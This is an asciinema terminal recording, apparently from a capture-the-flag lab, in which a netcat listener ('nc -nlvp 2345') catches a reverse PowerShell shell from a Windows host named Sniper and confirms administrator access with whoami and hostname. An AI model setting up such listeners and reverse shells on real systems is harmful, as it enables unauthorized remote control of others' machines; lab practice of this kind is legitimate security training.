{"version": 2, "width": 150, "height": 34, "timestamp": 1585272010, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.15791, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[0.159444, "o", "\u001b]2;root@parrot: /home/prashant/Desktop\u0007\u001b]1;..shant/Desktop\u0007"]
[0.182289, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mDesktop\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[0.18256, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.89366, "o", "asciinema rec"]
[1.075917, "o", "\u001b[13Dexit         \u001b[9D"]
[1.387826, "o", "\b\b\b\bnc -nlvp 2345"]
[2.251868, "o", "\u001b[?1l\u001b>"]
[2.252515, "o", "\u001b[?2004l\r\r\n"]
[2.253031, "o", "\u001b]2;nc -nlvp 2345\u0007\u001b]1;nc\u0007"]
[2.256921, "o", "listening on [any] 2345 ...\r\n"]
[34.738677, "o", "connect to [10.10.14.34] from (UNKNOWN) [10.10.10.151] 49956\r\nWindows PowerShell \r\r\nCopyright (C) Microsoft Corporation. All rights reserved.\r\r\n\r\r\n"]
[34.990342, "o", "PS C:\\Windows\\system32> "]
[36.124126, "o", "w"]
[36.331271, "o", "h"]
[36.571476, "o", "o"]
[36.795348, "o", "a"]
[36.915334, "o", "m"]
[37.147289, "o", "i"]
[37.403119, "o", "\r\n"]
[37.651679, "o", "whoami\r\r\n"]
[37.936966, "o", "sniper\\administrator\r\r\nPS C:\\Windows\\system32> "]
[38.907423, "o", "h"]
[39.211356, "o", "o"]
[39.611341, "o", "s"]
[39.81944, "o", "t"]
[40.115284, "o", "n"]
[40.235139, "o", "a"]
[40.387455, "o", "m"]
[40.507221, "o", "e"]
[40.763262, "o", "\r\n"]
[41.136612, "o", "hostname\r\r\n"]
[41.456581, "o", "Sniper\r\r\nPS C:\\Windows\\system32> "]
[42.835791, "o", "^C\r\n"]
[42.836162, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[42.836444, "o", "\u001b]2;root@parrot: /home/prashant/Desktop\u0007\u001b]1;..shant/Desktop\u0007"]
[42.86025, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mDesktop\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[42.86062, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[43.244924, "o", "e"]
[43.587335, "o", "\bex"]
[43.739656, "o", "i"]
[43.971434, "o", "t"]
[44.203667, "o", "\u001b[?1l\u001b>"]
[44.204075, "o", "\u001b[?2004l\r\r\n"]
[44.204648, "o", "\u001b]2;exit\u0007\u001b]1;exit\u0007"]
